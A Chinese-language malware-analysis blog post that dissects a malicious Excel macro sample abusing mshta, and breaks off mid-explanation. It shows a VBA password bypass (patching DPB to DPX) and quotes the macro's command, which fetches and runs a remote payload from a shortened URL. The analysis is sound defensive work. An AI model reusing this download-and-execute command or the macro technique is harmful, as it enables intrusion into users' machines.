<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"omicron.fun","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="LOLBins？白利用？">
<meta property="og:type" content="article">
<meta property="og:title" content="白利用样本分析">
<meta property="og:url" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="LOLBins？白利用？">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1569032439148.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568700914266.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568701019946.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568701133139.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568701258084.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/one.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/twe.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568702998371.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/tre.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568707283814.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568711636126.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568712290013.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568712388295.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568712605113.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568712787996.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568713407860.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568713418906.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568713432694.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568717291309.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568717376639.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568717355454.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568947536639.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568720149895.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568720374808.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568717725098.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/ent.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568717986373.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568703366807.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568718523308.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568718543116.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568718651259.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568718896110.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568718790294.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568719303353.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568719876899.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568720149895.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/fiv.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568811768760.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568811843745.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568811920864.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568812725529.png">
<meta property="og:image" content="d:/MarkDown/2019.09/190915-白利用样本分析.assets/1568784995383.png">
<meta property="og:image" content="d:/MarkDown/2019.09/190915-白利用样本分析.assets/1568787067786.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/fre.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568805329247.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568805699447.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568873153365.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568873457430.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568873708954.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874084103.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874099252.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874116597.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874134581.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874155036.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874407622.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874427796.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874447295.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874465857.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874482584.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874503425.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874749307.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874859753.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874870034.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874897850.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568874947103.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568875033757.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568806631396.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/six.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568875595468.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568891469826.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568891491536.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568891638233.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/siv-1568895130146.gif">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568895237529.png">
<meta property="og:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1568895619765.png">
<meta property="article:published_time" content="2019-09-23T02:00:00.000Z">
<meta property="article:modified_time" content="2020-04-17T03:09:56.000Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="宏病毒">
<meta property="article:tag" content="白利用">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/1569032439148.png">

<link rel="canonical" href="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>白利用样本分析 | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://omicron.fun/2019/09/23/03_%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/190915-%E7%99%BD%E5%88%A9%E7%94%A8%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          白利用样本分析
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2019-09-23 10:00:00" itemprop="dateCreated datePublished" datetime="2019-09-23T10:00:00+08:00">2019-09-23</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-04-17 11:09:56" itemprop="dateModified" datetime="2020-04-17T11:09:56+08:00">2020-04-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%AD%A6%E4%B9%A0%E6%8A%A5%E5%91%8A/" itemprop="url" rel="index"><span itemprop="name">学习报告</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <blockquote>
<p>LOLBins？白利用？</p>
</blockquote>
<a id="more"></a>

<blockquote>
<ul>
<li>什么程序才能称之为LOLBins？<ul>
<li>可以是带有Microsoft签名的二进制文件，可以是Microsoft系统目录中二进制文件。</li>
<li>可以是第三方认证签名程序。</li>
<li>对APT或红队渗透方有用的功能</li>
<li>该程序除过正常的功能外，可以做意料之外的行为。（如：执行恶意代码、绕过UAC）。</li>
</ul>
</li>
</ul>
</blockquote>
<h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><h1 id="样本基础信息"><a href="#样本基础信息" class="headerlink" title="样本基础信息"></a>样本基础信息</h1><table>
<thead>
<tr>
<th align="center">样本名称</th>
<th align="center">样本类型</th>
<th align="center">样本大小</th>
<th align="center">样本MD5</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Order____679873892.xls</td>
<td align="center">恶意宏</td>
<td align="center">41472 bytes</td>
<td align="center">7641FEF8ABC7CB24B66655D11EF3DAF2</td>
</tr>
</tbody></table>
<ul>
<li><p>流程图示例攻击过程</p>
<p><img src="1569032439148.png" alt="1569032439148"></p>
</li>
</ul>
<h1 id="技术分析"><a href="#技术分析" class="headerlink" title="技术分析"></a>技术分析</h1><h1 id="攻击来源"><a href="#攻击来源" class="headerlink" title="攻击来源"></a>攻击来源</h1><ul>
<li><p>样本攻击来自<code>xls</code>文档宏，利用自动运行宏启动<code>mshta</code>，下载有效载荷实现攻击。</p>
<p><img src="1568700914266.png" alt="1568700914266"></p>
</li>
</ul>
<h1 id="使用密码保护宏"><a href="#使用密码保护宏" class="headerlink" title="使用密码保护宏"></a>使用密码保护宏</h1><ul>
<li><p>这个样本使用了密码来保护宏代码，可以使用修改二进制数据实现破解，也可以通过密码猜解工具破解密码</p>
<p><img src="1568701019946.png" alt="1568701019946"></p>
</li>
<li><p>采用修改<code>DPB</code>的方式绕过密码</p>
<p><img src="1568701133139.png" alt="1568701133139"></p>
</li>
<li><p>将<code>DPB</code>修改为<code>DPX</code>就可以取消密码，然后重新在宏面板里面设置密码，就可以绕过原本的密码保护看到宏代码。</p>
<p><img src="1568701258084.png" alt="1568701258084"></p>
<p>无视这个提示继续即可，记得按下<code>Alt + F11</code>打开宏代码编辑</p>
<p><img src="one.gif" alt="one"></p>
</li>
</ul>
<h2 id="分析VBA宏代码"><a href="#分析VBA宏代码" class="headerlink" title="分析VBA宏代码"></a>分析<code>VBA</code>宏代码</h2><ul>
<li><p>分析宏代码的时候，一般代码都是被混淆过的，关注几个重要点就好了：</p>
<ul>
<li><code>Shell</code>：一般是执行命令</li>
<li><code>Run</code>：同样的，可能启动什么程序</li>
<li><code>Create Object</code>：创建一个对象</li>
</ul>
</li>
<li><p>这里可以直接看到一个<code>Shell</code>，所以直接以这个为突破点，监视要执行的命令</p>
<p><img src="twe.gif" alt="twe"></p>
<p>执行的命令是：<code>&quot;mshta http://bit.ly/8hsshjahassahsh&quot;</code></p>
<p><img src="1568702998371.png" alt="1568702998371"></p>
</li>
<li><p>其他的宏代码可以不用关心，因为其实已经使用<code>Process Monitor</code>监视过行为了，只有这个动作是我们需要关注的</p>
</li>
</ul>
<h2 id="mshta-白利用简析"><a href="#mshta-白利用简析" class="headerlink" title="mshta 白利用简析"></a><code>mshta </code>白利用简析</h2><blockquote>
<p>很长一段时间以来，HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分。</p>
<p>HTA文件在网络安全领域内广为人知，从红队和蓝队的角度来看，它是绕过应用程序白名单有价值的“古老”方式之一。</p>
<p>运行Microsoft HTML应用程序主机的<strong>Mshta.exe</strong>，Windows OS实用程序负责运行<strong>HTA</strong>（HTML应用程序）文件。我们可以运行JavaScript或Visual的HTML文件。</p>
